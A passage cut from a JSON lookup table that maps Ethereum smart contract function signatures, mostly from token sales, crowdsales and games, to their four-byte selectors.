"0x5e1ce5b0", "getDiaryLength()": "0x399fd8d9", "priceTokenSellWei()": "0x9598790d", "lastOracleFee()": "0x553b6f83", "stage2Sale()": "0xaef35e6a", "extensionTime()": "0xeeed1b26", "AWD()": "0x526e7f3a", "supplyLimit()": "0x19d1997a", "proofLink()": "0x16915743", "defaultWaitTime()": "0x70936880", "distributionuserFinished()": "0xc8b21f18", "RoundBSold()": "0x86a33a0b", "getInitialPrice()": "0x06f660ef", "nextContract()": "0xd8787fde", "maxRate()": "0xece1d6e5", "totalOVCSold()": "0x13844e60", "MIN_CONTRIBUTION()": "0x40650c91", "adminSum()": "0x2cf6e740", "DOWN_totalBets()": "0xdab5fdc4", "amountRaisedUSD()": "0x025404d4", "getTimeBonus()": "0xee207e07", "FACTOR_1()": "0xfca9bb5f", "isEarlyInvestors()": "0x5c7584b9", "mintingContract()": "0xd2f6f67d", "month30Allocated()": "0xea383176", "foundationLock()": "0x2690f0d5", "R1()": "0xb22dd2ca", "totalProportion()": "0x22e5aa3a", "getNumRefundTransactions()": "0x19006185", "coinsIssuedCmp()": "0x795da78f", "nextroundsoldierreplenishrate()": "0xb5a7900e", "InitiateGame()": "0x6c56bfc0", "getPreIcoTokenHoldersAddressesCount()": "0x49e627d2", "nameLocked()": "0xa740de43", "getCostToCancel()": "0x8ef22afe", "IsActive()": "0x304dd754", "tokenA()": "0x0fc63d10", "burnSplitPercent()": "0x2c22f2e2", "_communitySupply()": "0xf0eb29fb", "isFinalised()": "0x8146f323", "escrowContract()": "0xe42a96e7", "DAICOCap()": "0xeecc3135", "defaultTokensPerWei()": "0xb9c0d227", "addressFundFoundation()": "0x540fd4df", "fstUnitPriceDenominator()": "0x2f2e2d7f", "incentivisingSupply()": "0xc77fe4d6", "promotionsAvailable()": "0xb77e4185", "tb()": "0x0ec0786d", "TheWinner()": "0x2d40957f", "getTokenWithdrawHold()": "0x83c28ecc", "refundedFunding()": "0xf2263e12", "updateKittensRemainingForSale()": "0x78d34986", "adminCharge_p1()": "0x5f497a09", "BONUS_ICO_ROUND2()": "0x3d20d9b0", "bltMaster()": "0x851c0cf6", "allPunksAssigned()": "0x8126c38a", "ownerLock()": "0x00e85279", "cryptaurRewards()": "0xa1cea675", "Wolk()": "0x227d535f", "viewBalance()": "0x3ff1e05b", "TOKENS_MAXIMUM_SUPPLY()": "0x2474e236", "rateLimiter_()": "0xb519cf31", "tRegSaleStart()": "0xb326124b", "currentSection()": "0x5cc3623a", "unlatchContract()": "0x2375766a", "totalWeiRaisedDuringPhase2()": "0xc4871039", "winnerDecidedGas()": "0x98af629b", "SOFT_CAPACITY()": "0x37b475d4", "officialTelegram()": "0xa10d6a51", "totaltokensold()": "0xa75c981d", "tokensForPresale1()": "0x4127d54a", "alfatokenFee()": "0x1acbf6e0", "referralTokenWallet()": "0xcc96019f", "finishBountyAt()": "0x6afeada3", "bigChicken()": "0x1ca46d61", "activeCanvasCount()": "0x4d95c76c", "totalDistributedi()": "0x70dc8259", "WHITELIST()": "0x1bb7cc99", "sellSupply()": "0x308f505b", "initialIssueMintingDate()": "0x75f9e6da", "dappId()": "0x9de0eb04", "SECURITY_ETHER_CAP()": "0xcd26e1a8", "CUTOFF_PRESALE_ONE()": "0x9317cb37", "getAgreementCount()": "0x008bed3e", "endTimeOfBids()": "0x59e994ca", "adventureItemContract()": "0x0e655432", "hasBeenConstructed()": "0x88ede276", "blockPeriod()": "0xaf0dfd3e", "monthlyPrice()": "0xa06c5a24", "finalizedICO()": "0x76197591", "getRemainingTimeInSecond()": "0xc44f7864", "angelAllocation()": "0x7a5a59ec", "allocateSupply()": "0xe335b5e9", "cat()": "0xe4881813", "buyOpen()": "0x43a88da6", "ICO_DURATION()": "0xc9d82c96", "endICOStage5()": "0xc3d8c099", "tokenMsg()": "0x74fcd919", "isBetLocked()": "0x0d1f9bb6", "preIcoOpen()": "0x90099ece", "CROSAIR_PRICE_THRESHOLD()": "0x397fe617", "SENDING_BLOCK()": "0xe36d3a43", "fundMintingAgent()": "0x48688367", "base_token()": "0x75ce738e", "discountValue10()": "0xa88fe73a", "MaxSupply()": "0xb36c1284", "teamSupply24Months()": "0x8b360f4d", "finalizedCapital()": "0x62735618", "PRE_ICO_TOKENS_AMOUNT()": "0xdf4dfa7f", "maxPublicSale()": "0xc31d3e8e", "smartSpeedEarning()": "0x05f29b89", "birthBlock_()": "0x69820a80", "isAds()": "0x2cea70e4", "koth()": "0x04267892", "nextGameSeedPercent()": "0xb8ef5f4d", "fiatPerAssetUnit()": "0x7c28ddc1", "privateSaleCloseTime()": "0x8bd50c1f", "xactionFeeNumerator()": "0x36a9f2f7", "film()": "0x32e5905b", "robottradingToken()": "0xe806c603", "twentyPercentWithBonus()": "0xbc101ffe", "rndMax_()": "0x8b68cd9d", "COO()": "0xe1b27e6b", "changeTotalAmount()": "0x44b8074c", "ECO_SYSTEM_HOLDER()": "0x211f390e", "etherToSendFund()": "0x66042e7a", "takeOwnershipFeePercents()": "0x79dc10a6", "lastWagerTimeoutTimestamp()": "0x924b573a", "tokenMintingEnabled()": "0xb966f350", "maxProfitPercentage()": "0x45c9a11a", "minPurchaseAmt()": "0xc5104c3d", "setCrowdsaleCompleted()": "0x5afd7627", "eos()": "0x913cf5ca", "tokenRate3()": "0x250b1154", "amountProportion()": "0xb055d1bc", "feeGame()": "0xb08c7730", "ADXSold()": "0x4433a440", "fundingRemainingAvailableInEth()": "0xe8af214a", "getMarketCount()": "0xfd69f3c2", "totalEthRefunded()": "0x40c243c9", "requestRefunding()": "0x7cd208b6", "coePerEthOffset()": "0x8e96eb3e", "unlocktime()": "0x323772ee", "TEAM_STAKE()": "0x38c9dbf3", "makerFee()": "0xfc741c7c", "issuingTokenOwner()": "0xadbd9753", "getPurchaserCount()": "0x91de5474", "referralInstance()": "0xc6ab848a", "fundingThreshold()": "0xb6f4f96c", "secondHighestBidder()": "0xc1b43a17", "COMPANY_RESERVE()": "0xb2a6d21b", "errCounter()": "0xe89b9ff6", "permissionManager()": "0xcc7a2049", "hardFundingGoal()": "0xcea10af7", "IcoContract()": "0x2a62b7fa", "unitEpicGrowth()": "0x967b3c21", "extraTokensPercent()": "0x53501052", "integrity()": "0xf0e53489", "issuanceFinished()": "0x4662299a", "totalHardcap()": "0xf6a3b1dd", "endMintingTime()": "0x284cb916", "lastBlock_f14Hash_uint256()": "0x956483c1", "BonusPoolSupply()": "0xa080249b", "rewardDays()": "0x53645caa", "m_account()": "0xd04148d6", "AikcoinSupply()": "0x25eafb45", "tokenCapForMainICO()": "0xdb6380ec", "Name()": "0x8052474d", "PrcntRate()": "0x21a91d2b", "EGGS_TO_HATCH_1CROCS()": "0x50921b6c", "currentPremiumSale()": "0x58c75136", "fixedFeeInCWC()": "0xb5b52096", "presaleActive()": "0x53135ca0", "FeeProvider()": "0x94c89af5", "communityAddr()": "0x11c4d4f4", "TOTAL_ETHER_HARD_CAP()": "0x579327fd", "pixelsPerCell()": "0x13f4b42c", "lastCompletedMigration()": "0xfbdbad3c", "adminLockdown()": "0x77410c03", "supportTokenAmount()": "0xc9cb0043", "coinsFlipped()": "0x8dcb8c21", "escrow_fee_numerator()": "0xf4ba89f9", "ICO_PHASE2_PERIOD()": "0xa50cf84e", "MAX_CANVAS_COUNT()": "0x77b1b2eb", "preIcoBonus()": "0x62492e9d", "collected_crowd_vitas()": "0xcade4f31", "MIN_PRE_FUNDING_GOAL()": "0xa1663c48", "limitPreIcoTokens()": "0x3edef04b", "signer2()": "0x38c0ac5f", "TOKEN_BOUNTY()": "0x299c55f7", "earlybirdEnded()": "0xa891fdc3", "endTimeLockedTokensTeam()": "0xe2187e6e", "burnPerweiYearly()": "0x9b5c0b5e", "logic()": "0xd7dfa0dd", "OverAllPerSell()": "0xf5b3beba", "StorageEnabled()": "0xba9a9e03", "FOUNDATION_POOL_TOKENS_VESTED()": "0x55176f51", "frozenDaysForICO()": "0xacd94ccb", "targetAddr()": "0x72e208eb", "elapsedPeriods()": "0x692345ee", "DATE_ICO_START()": "0x95cc2e8b", "UTILITY_ROLE()": "0x8f296759", "ContributedAmount()": "0xd3c65384", "lastTimeUpdate()": "0x035ac814", "checkPayout()": "0xb145c013", "dripRate()": "0xd3261592", "totalNumberMinted()": "0xf1ff3d4b", "createdTime()": "0xb2f4bdb0", "ROLE_OPERATOR()": "0x98a1b397", "HIDDEN_CAP()": "0x13582b6e", "presale_tokens()": "0xc6620580", "atl()": "0x5c6eb2d2", "totalNormalTokenGenerated()": "0xfb40340d", "profit3eggs()": "0xd095d499", "CEO()": "0xa1088571", "priorityPassContractAddress()": "0x3e84b266", "IsPreICO()": "0xb719397f", "EGLSold()": "0x85cba722", "tokenFeePercent()": "0x36ca97d6", "unsoldVUPDestination()": "0x9371de6e", "pre_PRICE()": "0x81aa8a4b", "lastBidAmount()": "0xe582b7e0", "REFERRED_BONUS_PERMILLE()": "0xe76f3d5a", "quorum()": "0x1703a018", "MASTERY_THRESHOLD()": "0xb2a4efd4", "profitrate()": "0x7e8306ae", "FOUNDER2_STAKE()": "0x6e0fb1c5", "ABDEL_ALLOCATION()": "0xbdfb481d", "firstBonusRate()": "0x99a856e3", "TOKENS_LOCKED_1Y_TOTAL()": "0x400ee783", "bountyLockEndTime()": "0x2c37a512", "hasICOFinished()": "0xf50ca46a", "EXT_COMPANY_STAKE_ONE()": "0x434ec416", "finishConfiguration()": "0x5fb4f78c", "GEE100()": "0x8d8f7780", "gasRewardPercent()": "0x4d7ad205", "blockedTimeForInvestedTokens()": "0x4a1e004c", "lastBlock_a3()": "0x966edae7", "BIGSELL()": "0x1273f6e7", "startBlockNumber()": "0x498a4c2d", "MAX_MILESTONE()": "0x96821fc1", "ico_stage()": "0xcea22b51", "mUpgradeCostFactor()": "0xd887ac35", "registered_racers()": "0xa18e133e", "marketCapBlue()": "0xebeac0c8", "withdrawAllEthToOwner()": "0xbfde4f62", "etherPriceInUSD()": "0x782a0170", "saleManagerAddress()": "0xd9a96f9b", "receivedWei()": "0x10e22d41", "totalEthInWei()": "0x933ba413", "XPA()": "0x419a88b6", "emissionOn()": "0x84e1bf74", "tokensBoughtInBonusProgram()": "0xa043bb16", "airdropBalance()": "0xee9267d1", "objectHelmet()": "0x7ac6e6a8", "adventureContract()": "0xddef6421", "PHASE1_RATE()": "0xb20c0e43", "tubFab()": "0x1cb6adec", "mintTokensForFounders()": "0xdaec8128", "PERCENT_BONUS()": "0x2d501611", "canCreateGames()": "0x50928ba4", "multisig()": "0x4783c35b", "bankAccount()": "0x377a0f53", "preIcoState()": "0x65e0e9a2", "maxTokenCap()": "0x0f96dd39", "priceFactorB()": "0xf49eee20", "inGameRewardAddress()": "0xf0a2c430", "mintingFoundersFinish()": "0x40f13c0f", "StartIcoStage()": "0xa4fa75cf", "devDivRate()": "0x77b68dae", "tokenUpgrader()": "0x8e4adf4e", "kycCertifier()": "0x0d46f91a", "times()": "0x9e3b34bf", "getKindAddress()": "0xe07c80fb", "generatePresaleHouse()": "0x199156e4", "TokenTotal()": "0xac9c3b7a", "preIcoAddr()": "0x7fa34e92", "refundWei()": "0x269e4f3c", "controlWallet()": "0x823e569e", "optionsSet()": "0x6355bf2f", "lastBlock_v11Hash_uint256()": "0x3f1da980", "optInGas()": "0x9642a19c", "TOTAL_PRESALE_TOKENS()": "0x763fd2ab", "isCryptoRomeLandComposableNFT()": "0xd1ce65ab", "createTokenToTeam()": "0x6e1f777d", "amountToRaiseInUsdCents()": "0x38e95d55", "devHolder()": "0x38e91e41", "mintFundsTokens()": "0xa67c8bc4", "unitsPerTransaction()": "0x61d161ea", "deedContract()": "0x4a4b7de6", "addChunk6ToWhiteList()": "0x9d67b404", "getCurrentTotalFunders()": "0x5896521b", "maximumTNB()": "0x4a923199", "RESERVE_SUPPLY()": "0xaa66797b", "migrationTarget()": "0x5b51acff", "house_edge()": "0x17cfd0d6", "random_num()": "0xedde8349", "isCanBuy()": "0x3079ddc3", "binaryAddress()": "0xdff2db71", "MINERS_STAKE()": "0xed0b01cf", "CurrentAirdropped()": "0xad459a1c", "isMEH()": "0xf3956a71", "PRE_ICO_ON()": "0xc2fe3321", "reservation()": "0x2a5c4675", "rightSharePrice()": "0x4dd12329", "codeExportCost()": "0x21f7ac0d", "year2Unlock()": "0xe3d5e6a3", "advBtyWallet()": "0xdd54cc0c", "interestFeePercent()": "0xfe8925f4", "dev1()": "0xa327c45d", "numRequests()": "0x9fb42b1f", "marriageDate()": "0x4d7d8a60", "getStages()": "0x79655bd0", "burnPerTransaction()": "0x27edf097", "TOTAL_RESERVE_FUND()": "0xcc16e6e1", "bidExpireBlockLength()": "0x1edd19e1", "getForeverRose()": "0xdf9e33e8", "getAdvisersConsultantsTokens()": "0x3b1019ef", "maxWeiTier2()": "0x00498257", "transferOwnershipOperation()": "0x4955a79e", "last_release_date()": "0x0f9aea56", "ratePerEthPhase3()": "0x301f0464", "RESELLING_LOCKUP_PERIOD()": "0xf833061b", "refundPercent()": "0x41fee898", "claim_block()": "0x8e29d149", "tokenSellCost()": "0xf1687a8d", "sanCurrentTotal()": "0x5e1d9aba", "tokensInUse()": "0xd22d9c6d", "totalCollectedETH()": "0x5d202249", "buildingCostWei()": "0x6e942f82", "pendingFunding()": "0x636b7e56", "STAKE_BONUS_MIN_THRESHOLD()": "0x4f73b8e6", "gameTime()": "0xa5d1c0c0", "airdropReceiversLimit()": "0x961cc569", "firstRoundWMStart()": "0x60965dc0", "fullfillAdvisors()": "0x09e8046a", "INITIAL_SUBSIDY()": "0x7a5f973b", "cardboardUnicornTokenAddress()": "0x3e8c34e5", "totalRedeemedValue()": "0xb4134e6e", "PRE_ICO_LIMIT()": "0x89fdd81d", "baseEthCapPerAddress()": "0xde8a6fa2", "liquidityFundAddress()": "0x1882d267", "_batch1_icosaleEndTimestamp()": "0x1fb150c4", "gx()": "0x06c91ce3", "TOKEN_LOCKING_PERIOD()": "0xce204bf1", "relinquishOwnershipAddress()": "0x752f3c8c", "onlineTime()": "0x9ee6a7c3", "votingPeriodBlockNumber()": "0x466df592", "DECIMAL_FACTOR()": "0x33fdbbe5", "peculOldAdress()": "0x94e5e890", "OFFICAL_VOTING_DAY_OF_MONTH()": "0x5d59072a", "rateEarlyStage3()": "0x10fe5a2a", "limitTeamType()": "0x087f4ece", "stepForPrice()": "0x614d5f07", "PoWH4DSupply()": "0xab6cab71", "privateSaleRate()": "0x612c0968", "ROLE_ADMIN()": "0xd391014b", "lockedTokenHolder()": "0x17e139a7", "FUNDS_WALLET()": "0x69b6438e", "PrivateCoinSupply()": "0xf8a21631", "totalStages()": "0xf86a3529", "transferrable()": "0x047a7ef1", "dataset_md5checksum()": "0xf0144a91", "min_investment_eth()": "0x11e3d606", "BONUS_LEVEL_2()": "0xfad774ee", "icoTotalSupply()": "0x247b188b", "finishRoundA()": "0x262b9f8c", "transferManagerContract()": "0xf6a31b9c", "_internalToken()": "0xe40a72d4", "nextIdentityAccount()": "0xfeb4c708", "frozenVaults()": "0xc6cd15aa", "signatureChecker()": "0xefb2bfd3", "discountEndTime()": "0x34810336", "maxPlay()": "0x8b27c179", "HAYATO_EXTRACTION_BASE()": "0x7a8f7be6", "dayPot()": "0x032ccf33", "minInvestmentICO()": "0x6b6f4826", "countProjects()": "0xecff58df", "mEtherValid()": "0x84bf6fac", "crowdsaleStartTime()": "0xe2fc421d", "founderTokenWithdrawnPhase4()": "0xa901ce92", "divbonus()": "0xec2929fb", "ICO_Tier()": "0x938db92e", "limitTransfer()": "0x278d9637", "jesterBank()": "0x9935b968", "PARSECS_PER_ETHER_BASE()": "0xbf664892", "mythexTokenAddress()": "0x4f3b8938", "exchange_coefficient()": "0xb99a8a00", "proposalsRank()": "0x95988a26", "failsafe()": "0x474a88cb", "potentialOwner()": "0x7762df25", "savedBalance()": "0x785105f6", "StageTwoEnable()": "0x00d56d71", "test_require()": "0x89325127", "numThings()": "0x98123528", "remove(address[])": "0x5e4ba17c", "add(address[])": "0xc4c1c94f", "updateEntries(address[],bool)": "0xb4670002", "initializeRefundableFundraiser(uint256)": "0x32bfaa23", "isPresaleActive()": "0x60d938dc", "initializePresaleFundraiser(uint256,uint256,uint256,uint256)": "0xd42e26f5", "release(uint8,address)": "0x587fae93", "add(uint8,address,uint256)": "0x4f7aede9", "init(uint8,uint256)": "0x3a95a3c8", "Dpc()": "0x9802dd1a", "backendWithdraw(address,uint256)": "0x8b5caa66", "AsiaCoin()": "0xc1b7a892", "getAmbassador(address)": "0x4004b6da", "destory()": "0x6bdebcc9", "changeHiddenOwner(address)": "0x193115b4", "doVote(bytes32)": "0x38f55e59", "hasVoted(bytes32,address)": "0xaadc3b72", "selfBalance()": "0xb0bed0ba", "CrowleyToken()": "0x7f46550f", "sendToken(address,address,address,uint256)": "0x3c8c6a1e", "frozenOf()": "0xc62d7407", "startMulti()": "0x765aa39e", "stopMulti()": "0x26e5b0be", "transferMulti(address,address,address,address,address,address,address,address,address,address,uint256)": "0x4fd23dd4", "EOCHToken()": "0xf137005f", "_progressAdPrice(uint256)": "0xbf6311c2", "_setSuggestedAdPrice(uint256,uint256)": "0xcbe324d8", "_cancelOffer(uint256)": "0x40c9adcf", "setSuggestedAdPrice(uint256,uint256)": "0x1dab2271", "setPriceProgression(uint16)": "0x5003c2cc", "setOwnerCut(uint16)": "0x8319da07", "buyAd(uint256)": "0xd5be4153", "cancelOffer(uint256)": "0xef706adf", "offerAd(uint256,uint256)": "0xcdd247a9", "setAdData(uint256,string,string)": "0xd1da8436", "addAd(uint32,uint32,string,string,uint256)": "0x218eee82", "adIds()": "0x032a0af7", "ExhibitToken()": "0x17776b86", "Nettekcoin()": "0x350dd4a4", "AworkerToken(uint256)": "0x1f42103c", "setTokenDescription(string)": "0x00d5da02", "OneExchangeToken()": "0x10bebe64", "DSP(uint256,string,string)": "0xcc33ad3d", "SOLUSCRSToken()": "0x75c69e39", "TXToken()": "0x27860587", "NatureX()": "0xc3d69d03", "forceRefundCfd(uint128)": "0x8c934d71", "tinyIPFShash(string)": "0x9a4ac102", "IPFShash(string)": "0x59e9fb1b", "rain(address[],uint256[])": "0x8491b49c", "getRandomItems(address,string)": "0xbc92bea5", "drawRandomItem(string,uint256)": "0x630bcd99", "getRandomBox(string)": "0x29db3256", "createRandomBox(string,address,uint64,uint256,uint128)": "0x1c674fba", "putSaveData(string)": "0x12795d7f", "getQuestionVote(string,uint256)": "0x50ef3bae", "getQuestionVotesAllCount(string)": "0x6dd40905", "vote(string,uint128,uint256)": "0xe5fe7870", "getQuestion(string)": "0xccb1c0a1", "createQuestion(string,address,uint128,uint256)": "0x3c15d28f", "unLockup()": "0x5eecdec0", "TaiChiCoin()": "0xfd473852", "USDYToken()": "0x603510cb", "mintForPrivateFiat(address,uint256)": "0xbaa40cd4", "setRate(int256)": "0x2587eb4e", "setupInitialState()": "0x5897a5a0", "releaseVestingTokens(address)": "0xbc5bf5bf", "addBeneficiaryVestor(address,uint256,uint256,uint256,uint256)": "0x55348d9b", "crowdsaleClosed()": "0xccb07cef", "getCurrentTierHardcap()": "0x997f50d8", "getCurrentTierRatePercentage()": "0x67e5f18c", "createSalesTierConfigMap()": "0xfcde6ebe", "setupInitialSupply()": "0x6f7d9acf", "setINCENTIVE_POOL_ADDR(address)": "0x8c89b1c7", "sendCommunity()": "0x939d3ac4", "sendFoundation()": "0x55b32c83", "sendFounders()": "0x94836dab", "sendIncentive()": "0xd8112523", "HammerChain()": "0x32546f7e", "acceptOp()": "0xe1bfc31e", "setOp(address)": "0xa36a7526", "sdc(address)": "0x714d582e", "payoutX(address,uint256)": "0x7c2db5ff", "snpb(uint256)": "0x491b0712", "sgpc(uint256)": "0x955f0460", "smg(uint256)": "0xa2a02202", "sgc(uint256)": "0x66adfbbd", "srb(uint256)": "0xfefb130e", "gcard(uint256,address)": "0x605b24be", "cd()": "0x0e995ff5", "cd1(address)": "0x697c37c5", "pf(address)": "0x1ed1f196", "cg()": "0xb215a879", "bmc(uint256,uint256,address)": "0x1fa3cfaa", "bc(uint256,address)": "0x4f1ea770", "grg(address)": "0x8671ef4d", "irbg(address,uint256)": "0x3d289a76", "sc(uint256,uint256,uint256,uint256,uint256)": "0xcc8c49aa", "gcsp(uint256)": "0xe0307e94", "gcpa(uint256)": "0xb9a41409", "getDayCount()": "0xeb60764f", "getPhaseCount(uint256)": "0x35995022", "setMintingDec(uint256)": "0x9bc8e9ee", "isTeamLockInPeriodOverIfTeamAddress(address,address)": "0xc0a14da4", "isValidContributorAddress(address,address)": "0x22e84682", "isValidContributorId(uint256)": "0xdf30e592", "isDayTokenActivated()": "0x10f1726d", "setInitialBlockTimestamp(uint256)": "0x852b6121", "DayToken(string,string,uint256,uint8,bool,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xf0206a0d", "finishPreSale3()": "0x1c9fbb11", "balancePreSale3()": "0x55b37685", "preSale3()": "0x4710c5bf", "TemporaryPyramid()": "0x46cee8f7", "switchToNextRound()": "0x80d52ed9", "startCrowdsaleY2(address)": "0xe2aa99ab", "startCrowdsaleY1(address)": "0xbdb084b2", "startCrowdsaleY0(address)": "0x91d558b7", "setRefundState()": "0x1f6b5b7d", "CGCToken(uint256,string,string)": "0x7405cee9", "retrieveOnFail()": "0xdcd93691", "claimTokensByAdmin(address)": "0x2e6b921c", "claimTokensByUser()": "0xcd13592a", "successful()": "0x9a9e3fd8", "adminshipLevel(address,uint8)": "0xc9c80a56", "getLoyaltyPoints(address)": "0xd04c9115", "getPairSellLoyaltyPerc(address,address)": "0xfdff31ed", "getSellDailyLimit(uint256,bytes2)": "0x86200842", "setSellDailyLimit(uint256,bytes2,uint256)": "0x4a9f0110", "setPriceOracle(address)": "0x530e784f", "getWeiSoldToday(address)": "0xad71766e", "getWeiPriceOneUsd()": "0x50ccf36b", "isTier2(address)": "0x2e3a4def", "isTier1(address)": "0x78843a95", "witness(bytes32,address)": "0x006bcb71", "add(bytes32)": "0x446bffba", "MyIdolCoinToken()": "0x50ea1c95", "distributeAmount(address[],uint256)": "0xea94c696", "AddAccountsInfo(address,uint256)": "0x6b9896ba", "CheckChangePlatformFlagAndAddAccountsInfo(address,address,uint256)": "0xf03fbf2f", "SetChangePlatformFlag(bool)": "0xc8f478e1", "Platform()": "0xfa16ab6c", "getWeiForCent(uint256)": "0x80f29894", "submitPrice(uint256,uint256)": "0xb3b548eb", "checkGoalandPrice()": "0x07f171b7", "Setuppresale(uint256,uint256)": "0xd7942050", "ARXpresale()": "0x8d35b9ce", "setPreIcoEndsAt(uint256)": "0x15d2fc8a", "ShareEstateTokenCrowdsale(address,address,uint256,uint256)": "0x2df33eee", "ShareEstateToken()": "0xff0cd868", "calculateBonus(bytes32,uint256)": "0xaa6bf687", "BonumFinancialTokenPreSale(uint256,uint256,address,address,uint256)": "0x0e2318cb", "Zitron()": "0xeae8cf88", "HECoin(address)": "0xfa52caf6", "omsairam18()": "0x341f5ee2", "APG()": "0xf8c32ccb", "changeTransferLock(bool)": "0xc14e6cd0", "Fluzcoin()": "0x355ae09c", "triggerHiddenCap()": "0xb5cf852d", "increaseCap()": "0x8eb717fc", "claimReservedTokens()": "0x77248e3d", "distributeBonus(address[])": "0x4a1b504f", "unlockTokenTransfers()": "0x7b830854", "sendTokensTo(uint256,address)": "0x1292de0b", "setEtherUsdRate(uint16)": "0x9d9ab2d8", "_saveBonus(address,uint256)": "0xe6560c94", "_getBonusAmount(uint256)": "0x6d8f83cf", "notExceedingSaleCap(uint256)": "0x114d38a0", "TokenCappedCrowdsale()": "0xa419165e", "isSale()": "0xf8c1c186", "changeTimes(uint256,uint256,uint256,uint256)": "0x892ad596", "TimedPresaleCrowdsale(uint256,uint256,uint256,uint256)": "0x46ebb5e2", "rICO(address,address)": "0x4d27a548", "SimpleMultiSig(uint256,address[])": "0xd73f3408", "AYA()": "0x56833b16", "sendBalance()": "0xe7422d29", "buyFromCurrentOwner(uint256)": "0x990cc5c9", "doublePrice(uint256)": "0xd8c42e42", "setImageHash(uint256,string)": "0x9e3edce9", "setArticleHash(uint256,string)": "0xce2fc873", "removeCollaborator(uint256,address)": "0x601b349c", "addCollaborator(uint256,address)": "0xd4bd5a0d", "setTitle(uint256,string)": "0x5102bc9d", "isCollaboratorOrOwner(address,uint256)": "0xe5ab8be0", "wikiRemoveTokenFrom(address,uint256)": "0xd9417d69", "wikiAddTokenTo(address,uint256)": "0x34a7ed17", "numberWikiPages()": "0x738d8d82", "createMultipleWikiPages(string[])": "0xc23a7427", "_ownMint(uint256)": "0xfdc9e72d", "paidCreateWikiPage(string,string,string,uint256)": "0x33b0f7f7", "createWikiPage(string,string,string,uint256)": "0x67460c25", "setCostToCreate(uint256)": "0x2de3cddc", "BOND()": "0xc1c1d218", "MSXAdvanced()": "0xebc58f62", "GEOCOIN()": "0xce7917d7", "BitbabeToken()": "0x21c6d7b6", "athToken()": "0x87f51ac2", "buyTokensInternal(address,uint256,string)": "0x9fe4b663", "buyTokensByOptions(address,uint256,string)": "0xc34492a7", "buyTokens(address,uint256,string)": "0x9fef26ce", "resumeIco()": "0x7f5f0d6a", "updateGenerationRatio(uint256,address)": "0x26746f5f", "isBannedUser(address)": "0x8fb74ae9", "isUserKYCVerified(address)": "0x6acf5cb3", "getHookOperatorContractAddress()": "0x6fee558c", "setHookOperatorContract(address)": "0xced0a3a5", "getUserFactoryContractAddress()": "0x85f255ea", "setUserFactoryContract(address)": "0x494b5e0f", "setTaxationPeriod(uint256)": "0x5e763946", "setTaxPercentage(uint256)": "0x699abb3c", "getDataContractAddress()": "0x61e91ea1", "getMonthlyTransactionVolumeReceiving()": "0x4e0f1064", "increaseMonthlyTransactionVolumeReceiving(uint256)": "0xf45b106a", "getMonthlyTransactionVolumeSending()": "0x8a6a8b6c", "increaseMonthlyTransactionVolumeSending(uint256)": "0x5d45b4a7", "getWeeklyTransactionVolumeReceiving()": "0xa744a633", "increaseWeeklyTransactionVolumeReceiving(uint256)": "0xc4a1fedf", "getWeeklyTransactionVolumeSending()": "0xbd3ccfc9", "increaseWeeklyTransactionVolumeSending(uint256)": "0x5f3e3db0", "getDailyTransactionVolumeReceiving()": "0x23240d81", "increaseDailyTransactionVolumeReceiving(uint256)": "0x20547a42", "getDailyTransactionVolumeSending()": "0x896ce019", "increaseDailyTransactionVolumeSending(uint256)": "0x20c5e29a", "isUserBanned()": "0xf3205c93", "banUser()": "0x712980a2", "isUserBlacklisted()": "0x34eb0cf5", "setUserBlacklistedStatus(bool)": "0xc2955bdf", "isFounderUser()": "0x67f83481", "markAsFounder()": "0x2eb9f831", "updateLastTransactionTime(uint256)": "0x82d33374", "updateKYCStatus(uint256)": "0xc7f6f40c", "updateGenerationRatio(uint256)": "0x3716ca33", "isUserPolicyAccepted()": "0xd1f2a7e2", "updateUserPolicy(bool,bool,bool,bool)": "0x5ae8a1e0", "isExchangeUser()": "0x10d89d37", "getUserData()": "0x22e8c87d", "isValidUser()": "0xaf949df9", "initUser(uint256)": "0x80a1ec2e", "initKYCUser(uint256)": "0xd4dd26fb", "initExchangeUser(uint256)": "0x75f41f4a", "markTokens(address,uint256)": "0x264282f2", "SNK(uint256,string,string)": "0x9b3a300b", "speechOfOwner(address)": "0x86e36ce2", "_firstTokenId(address)": "0x25fa8a4f", "stageGenomes(uint8)": "0x9b3725e8", "beforeBuy()": "0x818fd7a1", "setStartDate(uint32)": "0xc373c0ef", "getPseudoRandomNumber()": "0x9c6f87e9", "nextGenome()": "0xb61cbcd3", "stagePrice(uint256)": "0xc43b7934", "stageEndDate(uint8)": "0x008fcc94", "stageStartDate(uint8)": "0x84e64a1f", "stageHardcap(uint8)": "0x7c79c167", "stageSoftcap(uint8)": "0xcfd129f8", "stageTokensBought(uint8)": "0x4cd44519", "setStageGenomes(uint8,string,string,string,string,string)": "0x3fefdb01", "releaseRestBalanceAndSend(address)": "0x896a17a4", "Start_quiz_qz(string,string)": "0xddfb8b9b", "transferEthereum(uint256,address)": "0x3daf099f", "redeemedKarmaOf(string)": "0x873cb0ab", "redeem(string,uint256,uint256,uint8,bytes32,bytes32)": "0x4b841fa9", "changeMaintainer(address)": "0xa12ee7ba", "claimTokens(uint256,address)": "0x6e164e23", "startBuyback(uint256,uint256)": "0x2cb71af3", "calcReward(uint256)": "0x544c465c", "LYNDO()": "0x10ab96e1", "Bitstraq_Token()": "0xe51d5c33", "_multipleTransfer(address,address[],uint256[])": "0x67e8f6e1", "ROSCcoin(uint256,string,string)": "0x41a6cfda", "getEns(address)": "0xde1c7f70", "setEns(string,address)": "0xbb5d69a0", "rescue(address)": "0x839006f2", "canRescue(address)": "0x90a6267a", "ARLCToken(uint256,string,string)": "0x10a64976", "removeIssuer(address)": "0x47bc7093", "addIssuer(address)": "0x20694db0", "LSYP()": "0xcc27f97b", "CRYPTOHEDGECoin(uint256,string,string)": "0x24141f14", "ROF()": "0x71e4cfd7", "FMC(uint256,string,string)": "0xca2f281b", "End(string)": "0x1e5d1a4c", "Quiz(string,string)": "0xf1d73540", "setAllFreeze(uint256,uint256)": "0x6d0f157d", "Zygoma()": "0xdb6bb289", "ZEXCoin()": "0x0c9f6ed8", "AgroeconomyToken()": "0x7c29c514", "addTransaction(address,uint256,uint256)": "0xefbc5469", "tokenWithdraw(uint256,address,uint256)": "0x9de0111f", "submitRemoveOwnerTransaction(address)": "0x60c72285", "submitAddOwnerTransaction(address)": "0x2b9cd08b", "submitWithdrawTokenTransaction(uint256,address,uint256)": "0x3c279f1f", "setToken(uint256,address)": "0xaf906cf3", "BitCashPlatform()": "0x6089e3c4", "canTransferBalance(address)": "0xbcc1480a", "initTransfer(address,uint256,uint256)": "0x65ea62ff", "initTransferArr(address[],uint256[],uint256[])": 